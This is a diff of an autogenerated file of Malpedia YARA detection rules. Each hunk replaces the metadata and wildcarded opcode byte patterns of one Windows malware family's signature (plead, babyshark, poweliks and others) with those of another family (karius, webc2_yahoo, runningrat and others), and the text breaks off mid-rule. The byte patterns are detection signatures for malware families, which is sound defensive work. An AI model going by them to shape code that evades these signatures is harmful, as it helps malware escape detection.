 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.plead"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.plead_auto.yar#L1-L236"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.karius"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.karius_auto.yar#L1-L247"
 		license_url = "N/A"
-		logic_hash = "3927d6d1b5e82a17fd417b0071c76ba719237a780a5f2d36d13d9a1ea487844d"
+		logic_hash = "c2392952453e4a9f29da2ad06ae05ba8bdd1282ea8bcab3057e95c6647f70010"
 		score = 75
 		quality = 73
 		tags = "FILE"
@@ -90399,46 +90738,48 @@ rule MALPEDIA_Win_Plead_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 6a01 ff15???????? 83c40c 85c0 7504 33c0 }
-		$sequence_1 = { 83c40c 8d4514 53 50 56 }
-		$sequence_2 = { ff15???????? 85c0 750c c745fcfbffffff }
-		$sequence_3 = { 85c0 7504 33c0 eb09 56 50 }
-		$sequence_4 = { ebda 33f6 c745fcf8ffffff 3bf7 750c 895dfc }
-		$sequence_5 = { 59 894510 0f878f000000 3bc3 0f8482000000 }
-		$sequence_6 = { 85c0 750f 56 ff15???????? 6afe 58 e9???????? }
-		$sequence_7 = { e8???????? 817d14e8030000 53 56 }
-		$sequence_8 = { 81ec1c020000 53 56 57 8965f0 ff15???????? 8bd8 }
-		$sequence_9 = { 8a10 03f2 40 49 8975fc 75ec 8bc6 }
-		$sequence_10 = { 50 f3ab c705????????01000000 ff15???????? 8b1d???????? ffd3 8bf8 }
-		$sequence_11 = { 8b942428020000 8b842424020000 52 50 51 8b8c2428020000 }
-		$sequence_12 = { 5d 8a44341c 32c2 8844341c 46 3bf1 }
-		$sequence_13 = { 52 ff15???????? 6aff a1???????? }
-		$sequence_14 = { 8b8c241c020000 68???????? 51 ff15???????? 33c0 81c418020000 c21000 }
-		$sequence_15 = { 8d7c241c 6804010000 52 50 }
-		$sequence_16 = { 648b1530000000 8b520c 8b521c 8b5a08 }
-		$sequence_17 = { 833f00 7420 85db 7505 bb50000000 }
-		$sequence_18 = { 6a04 6800200000 ff7750 50 ff5644 }
-		$sequence_19 = { 51 035b3c 894334 e8???????? 8b45f8 }
-		$sequence_20 = { 89048a 8945ec 8b567c 895004 c7467c00000000 }
-		$sequence_21 = { e8???????? b02c aa 8b4510 85c0 }
-		$sequence_22 = { 85c0 0f849f020000 8945f0 6a0c 8d4de0 }
-		$sequence_23 = { 6a00 ff75f8 ff5648 eb0d }
+		$sequence_0 = { 41b830000000 488bcf ff15???????? 4885c0 }
+		$sequence_1 = { 0f84b3000000 458b9f88000000 4d03de 418b5b18 }
+		$sequence_2 = { 41837b1400 0f8492000000 458b4320 458b5324 33ed 4d03c6 4d03d6 }
+		$sequence_3 = { 488b05???????? 4885c0 7512 ff15???????? 488905???????? 4885c0 }
+		$sequence_4 = { 498bce ffd3 4183bf8c00000000 0f84b3000000 458b9f88000000 }
+		$sequence_5 = { 418b5b18 85db 0f849d000000 41837b1400 }
+		$sequence_6 = { 33ed 4d03c6 4d03d6 448bcd 85db 0f8477000000 8bb424b0000000 }
+		$sequence_7 = { 8bb424b0000000 418b10 8bcd 4903d6 0fb602 0f1f440000 c1c90d }
+		$sequence_8 = { c3 85c0 7505 e8???????? b801000000 }
+		$sequence_9 = { 8b4dfc 83c704 83c104 83c404 894dfc 8bd0 8955f8 }
+		$sequence_10 = { a3???????? 85c0 74e2 ff750c 6a08 50 }
+		$sequence_11 = { 8bc7 ffc8 7416 ffc8 }
+		$sequence_12 = { 0f93c0 eb06 803900 0f94c0 84c0 }
+		$sequence_13 = { 488bc8 ff15???????? 4c8be8 498bce }
+		$sequence_14 = { 8d7b01 448bfb 448be3 4885c9 }
+		$sequence_15 = { c7400c02000000 c7401401000000 8d4104 5d c3 8a01 3c22 }
+		$sequence_16 = { 488d4b10 488d542450 41b804000000 c6430f68 }
+		$sequence_17 = { 7405 f60001 7502 33c0 }
+		$sequence_18 = { 4d8bcf 33d2 41b800001000 488bce ff15???????? }
+		$sequence_19 = { 47 3c2b 7404 3c2d 7501 }
+		$sequence_20 = { 83c40c 85c9 0f8485000000 8a01 }
+		$sequence_21 = { 4d8bcc 4d8bc7 488bd0 488bce ff15???????? 85c0 }
+		$sequence_22 = { 5e 894d0c 5d e9???????? 3c7b 750a 5e }
+		$sequence_23 = { ebc8 8a06 3c41 720c }
+		$sequence_24 = { 6683f809 7505 8d7b02 eb09 }
+		$sequence_25 = { 41b900300000 448bc0 33d2 488bce ff15???????? 4c8bf0 }
 
 	condition:
-		7 of them and filesize < 8224768
+		7 of them and filesize < 434176
 }
-rule MALPEDIA_Win_Babyshark_Auto : FILE
+rule MALPEDIA_Win_Webc2_Yahoo_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bba62dea-b8fb-5177-af59-ee7484609223"
+		id = "4eedce59-ab20-52b2-90a4-b849754d3956"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.babyshark"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.babyshark_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_yahoo"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.webc2_yahoo_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "170a55c792dd841a430b5276e4b7ea8cd0c0e2d28c406b503a22728951bd6c1d"
+		logic_hash = "3d2dd09691f298cf3eef54b62db7cef2339bebabc7bbad3cbeaa6cf7557fae03"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -90452,32 +90793,32 @@ rule MALPEDIA_Win_Babyshark_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c40c 8d4c2404 6a00 51 ffd6 6a00 }
-		$sequence_1 = { 8bc8 83e01f c1f905 8b0c8d607e4000 8a44c104 83e040 }
-		$sequence_2 = { 8b0c8d607e4000 8a44c104 83e040 c3 a1???????? }
-		$sequence_3 = { bf???????? f3ab 8d3452 895dfc c1e604 aa 8d9ec8674000 }
-		$sequence_4 = { 80e920 ebe0 80a0206c400000 40 3bc6 72be 5e }
-		$sequence_5 = { 8db6bc674000 bf???????? a5 a5 59 a3???????? }
-		$sequence_6 = { 8a8094504000 83e00f eb02 33c0 0fbe84c6b4504000 }
-		$sequence_7 = { c1f804 83f807 8945d0 0f879a060000 ff2485271a4000 834df0ff }
-		$sequence_8 = { 5e 8d0c8dc8614000 3bc1 7304 3910 7402 }
-		$sequence_9 = { ff15???????? 8bf0 68???????? 8d442408 68???????? 50 }
+		$sequence_0 = { ff75e4 ffd7 85c0 7453 837dec00 }
+		$sequence_1 = { 8d8507ffffff be???????? 50 56 e8???????? 6a00 }
+		$sequence_2 = { 8365c800 6a09 59 33c0 8d7dcc 53 f3ab }
+		$sequence_3 = { 57 ff75fc 0345f4 50 e8???????? 56 e8???????? }
+		$sequence_4 = { eb9f b8???????? c3 55 8bec }
+		$sequence_5 = { 59 8bc6 5e c20400 33c0 c701???????? 89819c841e00 }
+		$sequence_6 = { 8816 8a11 8817 8a10 33db }
+		$sequence_7 = { 50 ff15???????? 6a64 e8???????? 8d85fcd7ffff }
+		$sequence_8 = { c686????????40 46 33c9 53 c686????????23 }
+		$sequence_9 = { 8d85fcd7ffff 57 50 ebb4 6a64 5b }
 
 	condition:
-		7 of them and filesize < 65272
+		7 of them and filesize < 8060928
 }
-rule MALPEDIA_Win_Gameover_P2P_Auto : FILE
+rule MALPEDIA_Win_Highnote_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f5c0a78b-346b-519f-ad74-638351724851"
+		id = "42430ae0-711a-5af0-8cf0-021ee7268750"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_p2p"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gameover_p2p_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.highnote"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.highnote_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "6bb48450821c79bc0f52b1eda3804ae910335d753ba80db1932c028cecce35a3"
+		logic_hash = "9c56af2f565860a63358a81454cb924c53c1536bda24fa1a3a598c536c013797"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -90491,32 +90832,32 @@ rule MALPEDIA_Win_Gameover_P2P_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 84c0 745f 53 bb00080000 3bf3 57 }
-		$sequence_1 = { 897c2424 896c2414 85c0 740f 8d542414 8bc8 }
-		$sequence_2 = { ff15???????? 8b4e0c 85c9 740f 8b5608 e8???????? 8b7608 }
-		$sequence_3 = { 834c2418ff 6880000000 6a01 53 53 8d442430 }
-		$sequence_4 = { 8d7e18 f60601 0f854efeffff 51 8d4c2430 e8???????? 8b4e50 }
-		$sequence_5 = { 7415 ff770c 8d442418 51 }
-		$sequence_6 = { 7409 8bd0 33c9 e8???????? 32c0 5e c9 }
-		$sequence_7 = { ffd5 83c40c f6c308 7408 668b4734 66894634 33c0 }
-		$sequence_8 = { 5e 5b c9 c20800 85db 7427 }
-		$sequence_9 = { 0f8481000000 57 ff75fc bf04010000 68???????? 53 8d85f0fdffff }
+		$sequence_0 = { 3c7b bc9e36398f 8027e9 82ad42476080cd e009 }
+		$sequence_1 = { 47 365e 3007 7bae 97 9d 884d13 }
+		$sequence_2 = { a8b9 a1???????? 9c 6857414608 d4dc 59 93 }
+		$sequence_3 = { 33c5 8945fc 8b4508 53 6808090000 8945e4 e8???????? }
+		$sequence_4 = { 4f 59 7def 889de81be9ec b96b0b724f 262415 3a1f }
+		$sequence_5 = { 0e ed 47 6908b79d84b8 6935????????3e1f20f8 4a d14529 }
+		$sequence_6 = { e76e a9a4fec7f3 1b90bff8ccdd b1e4 f7f4 }
+		$sequence_7 = { 3b3f a3???????? 0c16 49 3852fc d938 6e }
+		$sequence_8 = { 1cfe 5f 3d4b9c06b4 12a4c5ea7849d5 ba7ab47152 1c98 d24cdca8 }
+		$sequence_9 = { 3cff 145d 853e 235ee7 }
 
 	condition:
-		7 of them and filesize < 598016
+		7 of them and filesize < 321536
 }
-rule MALPEDIA_Win_Snatch_Loader_Auto : FILE
+rule MALPEDIA_Win_Badencript_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d74b7542-a17c-5e73-9f4b-d6fcbd7ec77a"
+		id = "ddb7f1a7-8259-5ec8-9b35-e98fb67b2310"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch_loader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.snatch_loader_auto.yar#L1-L174"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.badencript"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.badencript_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "58c7bbc8e69216b73bd02826084d61ba1cc9680e841df4cda286961c3330efac"
+		logic_hash = "4aaa48768d97770f6e85ee594f356b88c6dabd160111a6a927596e69e9ca03f4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -90530,40 +90871,34 @@ rule MALPEDIA_Win_Snatch_Loader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 53 56 57 33db bfe71edec0 895dfc }
-		$sequence_1 = { 8975fc 66397102 740b 42 0fb7c2 6639744102 }
-		$sequence_2 = { 85c0 7505 8b7dfc eb04 ffd0 8bf8 }
-		$sequence_3 = { 53 56 57 ffd0 5f 85c0 }
-		$sequence_4 = { 53 bb00040000 56 8bcb e8???????? 8bf0 }
-		$sequence_5 = { 83ec0c 56 33f6 8bd6 8975fc 66397102 }
-		$sequence_6 = { 53 56 33f6 8bd9 57 85c0 7522 }
-		$sequence_7 = { 85c0 8bce 0f457dfc e8???????? }
-		$sequence_8 = { 5e eb03 83c704 83c304 41 833eff }
-		$sequence_9 = { 52 ff750c e8???????? 8945fc 0bc0 }
-		$sequence_10 = { 68???????? 58 ffd0 8945f0 }
-		$sequence_11 = { 53 57 56 33db 6a04 6800300000 }
-		$sequence_12 = { 41 3b4df8 72ee 8bc2 034508 5a 59 }
-		$sequence_13 = { 734f ff7510 e8???????? 8945f8 0bc0 7440 3b45fc }
-		$sequence_14 = { 0bc0 7440 3b45fc 773b 8b750c 8b7d10 }
-		$sequence_15 = { 33c9 8a0431 0ac0 741f }
+		$sequence_0 = { 23c1 eb55 8b1c9d68d14000 56 6800080000 }
+		$sequence_1 = { 8b0c8d48414100 c644112800 85f6 740c }
+		$sequence_2 = { 660fd60f 8d7f08 8b048d04b54000 ffe0 }
+		$sequence_3 = { 57 8d1c85383d4100 33c0 f00fb10b 8b15???????? 83cfff }
+		$sequence_4 = { 7451 83e809 7443 83e801 0f8501010000 c745e0a40f4100 }
+		$sequence_5 = { 660fd60f 8d7f08 8b048d04b54000 ffe0 f7c703000000 7413 }
+		$sequence_6 = { c1fa06 6bc830 8b049548414100 f644082801 7414 8d4508 8945fc }
+		$sequence_7 = { 6bc830 8b049548414100 f644082801 7421 57 e8???????? }
+		$sequence_8 = { 83e03f c1fa06 6bc830 8b049548414100 f644082801 7414 }
+		$sequence_9 = { 7313 8a8750304100 08441619 42 }
 
 	condition:
-		7 of them and filesize < 262144
+		7 of them and filesize < 335872
 }
-rule MALPEDIA_Win_Gophe_Auto : FILE
+rule MALPEDIA_Win_Hookinjex_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ec866cdd-740c-530f-890b-7218c8279731"
+		id = "71399701-93a4-54b6-a1f8-3cb7f4c94c21"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gophe"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gophe_auto.yar#L1-L160"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hookinjex"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hookinjex_auto.yar#L1-L157"
 		license_url = "N/A"
-		logic_hash = "040add08167375d6afc19889da745c342bfdae4cd932188be1ff896b4e36f3aa"
-		score = 75
-		quality = 75
+		logic_hash = "8fbd3eb9a9d2410863924e40f8ff07b371959d0645dbb4e7cd7484e6ff1ff474"
+		score = 60
+		quality = 25
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -90575,38 +90910,38 @@ rule MALPEDIA_Win_Gophe_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 833902 0f94c0 84c0 7407 }
-		$sequence_1 = { 8bf8 488b4c2440 488b01 ff5010 }
-		$sequence_2 = { 85c0 7509 b803000000 5d c20400 }
-		$sequence_3 = { 85c0 741c b800070000 5f }
-		$sequence_4 = { 8b07 85c0 7506 807e1000 7503 8a4e10 }
-		$sequence_5 = { 8bd8 85db 0f8498010000 83fbff }
-		$sequence_6 = { 84c0 7407 e8???????? eb06 e8???????? 90 488d8c24b8000000 }
-		$sequence_7 = { 84c0 0f8461ffffff e8???????? e9???????? }
-		$sequence_8 = { 7838 488b4c2440 ff15???????? 8bf8 85c0 7818 488b4c2440 }
-		$sequence_9 = { 8b05???????? 85c0 0f85a9000000 4533c9 4533c0 8d5010 }
-		$sequence_10 = { 8b442424 85c0 7408 3bc1 }
-		$sequence_11 = { 85f6 7416 6830020000 6a00 }
-		$sequence_12 = { e8???????? 4883f8ff 0f849e000000 8b05???????? }
-		$sequence_13 = { 894614 8b4614 85c0 740a }
-		$sequence_14 = { 8b4dec 33cd e8???????? 8be5 5d c21000 c745fc02000000 }
-		$sequence_15 = { c7000300150c 488b4210 c7400801000000 488b4210 }
+		$sequence_0 = { e8???????? b80a020000 eb02 33c0 }
+		$sequence_1 = { e8???????? 85c0 7408 803b00 7403 48ffc3 }
+		$sequence_2 = { e8???????? 85c0 740f b907b60000 }
+		$sequence_3 = { e8???????? 833d????????00 7411 b906000000 e8???????? 488905???????? c705????????01000000 }
+		$sequence_4 = { e8???????? 85c0 740c b913e40000 }
+		$sequence_5 = { e8???????? 833d????????00 7411 b903000000 e8???????? 488905???????? }
+		$sequence_6 = { e9???????? 488b4c2458 e8???????? 488b4c2450 }
+		$sequence_7 = { e8???????? 85c0 750f b9dc550100 }
+		$sequence_8 = { 25ff9fffff 89442420 8b442420 89442448 }
+		$sequence_9 = { 0f843d010000 488b442440 488b4c2470 488b4920 }
+		$sequence_10 = { 0f84c0000000 48833d????????00 0f84b2000000 41b810000000 488d9424d8000000 }
+		$sequence_11 = { 0f8430010000 488d8c2410030000 e8???????? 4889842460020000 41b07b }
+		$sequence_12 = { 25ff0f0000 89442448 488b0d???????? 48894c2450 }
+		$sequence_13 = { 03442460 488b4c2468 8901 e9???????? 488b542470 488d4c2430 }
+		$sequence_14 = { 253fffffff 89842488000000 eb10 8b442420 }
+		$sequence_15 = { 25c0000000 83f840 750d c78424dc01000001000000 }
 
 	condition:
-		7 of them and filesize < 1582080
+		7 of them and filesize < 6545408
 }
-rule MALPEDIA_Win_Deltas_Auto : FILE
+rule MALPEDIA_Win_Hotwax_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "25a7191c-2842-5745-a11d-ea324cb5fa9f"
+		id = "d6f02e96-b0de-561a-b1c4-f7fa097556ab"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.deltas"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.deltas_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hotwax"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hotwax_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "c404323fb1d2a8c3fdb1b29caf32d56e1cbc5b9f3900009b6282344552f18e72"
+		logic_hash = "fe64f11364e8e368736d318c239a3692d708ee4c24b150c29655e2d18f1cd86c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -90620,32 +90955,32 @@ rule MALPEDIA_Win_Deltas_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffd3 8b442420 85c0 7507 c6851045000001 }
-		$sequence_1 = { 03f3 8b5604 8b06 85c0 }
-		$sequence_2 = { 55 ff15???????? 83fbff 7407 53 ff15???????? 8b442410 }
-		$sequence_3 = { 0bc2 33c1 03c5 8b6c2424 8db430e0e62cfe 8bc6 c1e816 }
-		$sequence_4 = { 85ed 7407 55 ff15???????? 83fbff 7407 }
-		$sequence_5 = { 8bc7 f7d0 03d1 0bc2 33c1 03442428 8d843097ff2a43 }
-		$sequence_6 = { 88442461 88442462 8b35???????? 8d442470 }
-		$sequence_7 = { 8b5604 89542448 8d542428 8b4608 }
-		$sequence_8 = { 8b44240c 8b35???????? 50 ffd6 8b4c2410 51 ffd6 }
-		$sequence_9 = { 55 56 8be9 57 b940000000 33c0 8dbc242d010000 }
+		$sequence_0 = { 4883ec20 488bd9 488d0de0b60000 483bd9 }
+		$sequence_1 = { 33c9 33d2 41ff5500 448bd8 85c0 0f85ef020000 8b4500 }
+		$sequence_2 = { 8945a0 496344243c 33d2 428b4c2050 41b900300000 c744242040000000 }
+		$sequence_3 = { 4885c0 7467 33d2 488bc8 }
+		$sequence_4 = { 85c0 0f8596000000 397ddc 0f848d000000 4c8d05247bffff }
+		$sequence_5 = { 4885c8 7507 8b0b 4803ca eb11 483bca 7245 }
+		$sequence_6 = { c6850205000000 c785e004000043726561 c785e404000074655468 c785e804000072656164 c685ec04000000 }
+		$sequence_7 = { 7343 8b471c 458b4d44 4d8b4530 4803c5 }
+		$sequence_8 = { ff15???????? 488d4c2468 33d2 41b868050000 83cbff }
+		$sequence_9 = { 4c8d0dac7fffff 4c8bd8 4b8b84f9a04b0100 4c895c3040 4b8b84f9a04b0100 498bd6 }
 
 	condition:
-		7 of them and filesize < 90112
+		7 of them and filesize < 198656
 }
-rule MALPEDIA_Win_Daolpu_Auto : FILE
+rule MALPEDIA_Win_Bravonc_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3b934422-e9dc-512e-b748-acfa3a6df0b8"
+		id = "46ca6b44-3777-5a69-8397-e443ebcbbb5c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.daolpu"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.daolpu_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bravonc"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bravonc_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "75ecbdb2c7e8916d3ac65192115d743be9db42508dfb2c41a685a14b393ff7b1"
+		logic_hash = "c173b555e387356384c480cbe1258c67f0fa737efd2cf0efcccd2c272e1e677f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -90659,71 +90994,71 @@ rule MALPEDIA_Win_Daolpu_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb30 e9???????? 488d4c2440 e8???????? 48c7842428010000ffffffff 488d8c2490000000 e8???????? }
-		$sequence_1 = { 75b0 0f28442430 488b5d97 0f1103 488d4dcf e8???????? 4c8b45ef }
-		$sequence_2 = { ebd9 488b442428 488b00 4889442430 49ba7030525e472705d3 488b442430 ff15???????? }
-		$sequence_3 = { 7612 49ffc0 488b542448 488d4c2440 e8???????? 4c897c2458 48c74424600f000000 }
-		$sequence_4 = { 7460 498bff 4c8d2dbe660900 498bc7 4a8b5c2808 483beb 7233 }
-		$sequence_5 = { 66c74424380100 488b45b0 48634804 488b4c0df8 48894c2470 4885c9 0f94442478 }
-		$sequence_6 = { 48896c2450 4c896c2448 4c8d2d4ea2f9ff 4c89742440 41be08000000 48899c2480000000 6666660f1f840000000000 }
-		$sequence_7 = { 7508 4883eb01 75eb eb1e 4885db 7419 0f1f4000 }
-		$sequence_8 = { 488b17 488d4203 483bc1 7709 4a8d0402 e9???????? 397320 }
-		$sequence_9 = { 488d8c24a8000000 e8???????? 83781000 740a b8ffff0000 e9???????? 488d8c24a8000000 }
+		$sequence_0 = { a1???????? 6a06 68???????? 50 ffd6 83c40c 85c0 }
+		$sequence_1 = { 034a24 034dfc 8d8401d6c162ca 8945fc }
+		$sequence_2 = { 56 8d85fcfeffff 56 50 ff750c 56 e8???????? }
+		$sequence_3 = { 8d45c8 68???????? 50 8d85e4feffff 50 e8???????? 83c40c }
+		$sequence_4 = { 59 33c0 8d7db0 895dac c645fc01 895df0 }
+		$sequence_5 = { 8bf1 57 8b7d0c 8b460c 8d0c38 3b4e08 }
+		$sequence_6 = { 66897004 5f 5e 668908 66895006 5b c9 }
+		$sequence_7 = { ff15???????? 59 3bc3 59 7404 802000 }
+		$sequence_8 = { 51 b85c120000 e8???????? 53 56 57 }
+		$sequence_9 = { 59 8d7db0 6a10 c745ac44000000 59 895df0 f3ab }
 
 	condition:
-		7 of them and filesize < 2877440
+		7 of them and filesize < 131072
 }
-rule MALPEDIA_Win_Poweliks_Auto : FILE
+rule MALPEDIA_Win_Unidentified_081_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1e577d24-5a33-56a2-89ea-12d263fea556"
-		date = "2024-10-31"
-		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poweliks"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.poweliks_auto.yar#L1-L123"
+		id = "4bef4e35-3450-5f50-98ad-424279417112"
+		date = "2023-12-06"
+		modified = "2023-12-08"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_081"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_081_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "25339dff3576021bbd48649b55b3a0a905a70a087edb57140d53477b59a39b79"
+		logic_hash = "0bf113d92abe743278ae5a94b3d8f7a48f5ba7f91d2e79f1d3ac361b6c786f4e"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20241030"
-		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
-		malpedia_version = "20241030"
+		malpedia_rule_date = "20231130"
+		malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351"
+		malpedia_version = "20230808"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7415 8b7d08 8b720c 81c704110000 03f7 8b7a04 03f8 }
-		$sequence_1 = { 8bce 85c9 7415 8b7d08 8b720c 81c704110000 }
-		$sequence_2 = { 81c604110000 6a40 6800300000 03de ff7350 6a00 ffd0 }
-		$sequence_3 = { 3a441dd0 7509 ff45fc 837dfc0d }
-		$sequence_4 = { 7506 40 83f80f 72eb 83f80f 7503 }
-		$sequence_5 = { 0fb74b06 ff45f4 83c228 394df4 72cd }
-		$sequence_6 = { 3bc8 75ce 8b5508 8b423c 8b441078 }
-		$sequence_7 = { 8bcb d2e0 0ad0 88543e01 ff45f8 fe45ff 8b45f8 }
-		$sequence_8 = { 8b45fc c9 c3 55 8d6c2488 81ec9c000000 6898000000 }
-		$sequence_9 = { 8b5df4 03d8 8a4405d0 3a441dd0 7509 }
+		$sequence_0 = { 8985c8fdffff 83f808 0f84ab090000 83f807 0f8777090000 ff24854fa44000 33c0 }
+		$sequence_1 = { c74518f0944100 50 8d4dc4 e8???????? 68???????? 8d45c4 }
+		$sequence_2 = { 68???????? b9???????? e8???????? c645fc03 33c0 }
+		$sequence_3 = { eb02 33c0 8bbdc8fdffff 6bc009 0fb6bc38e8544100 8bc7 89bdc8fdffff }
+		$sequence_4 = { 8b7508 c7465c48554100 83660800 33ff }
+		$sequence_5 = { c645fc01 33c9 66a3???????? 66390d???????? 8bc6 c705????????07000000 0f44c1 }
+		$sequence_6 = { 88440a34 8b049dd0d14100 c744023801000000 e9???????? ff15???????? 8bf8 }
+		$sequence_7 = { 83e61f c1f805 c1e606 8b0485d0d14100 80643004fd 8b45f8 }
+		$sequence_8 = { 6a01 6a00 f7d8 50 53 ff15???????? 8b8d34ffffff }
+		$sequence_9 = { ff15???????? 837c241001 7507 b101 e8???????? 8b35???????? }
 
 	condition:
-		7 of them and filesize < 115712
+		7 of them and filesize < 273408
 }
-rule MALPEDIA_Win_Dusttrap_Auto : FILE
+rule MALPEDIA_Win_Runningrat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "94c0bae7-72b6-5bce-b0c6-34a621d70e05"
+		id = "297d1859-ca3a-5430-a307-3e48917944b6"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dusttrap"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dusttrap_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.runningrat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.runningrat_auto.yar#L1-L163"
 		license_url = "N/A"
-		logic_hash = "f4b4f45042cbce5a99225f86a255feaeb3d8c391ba31ee586efa9930ba8ea747"
+		logic_hash = "cc8e1228550694df797c7f86352429950a0d9bf3c450fac5ae045f777304a562"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -90737,32 +91072,37 @@ rule MALPEDIA_Win_Dusttrap_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7507 b904000000 eb1f 4181f800000060 7507 b920000000 eb0f }
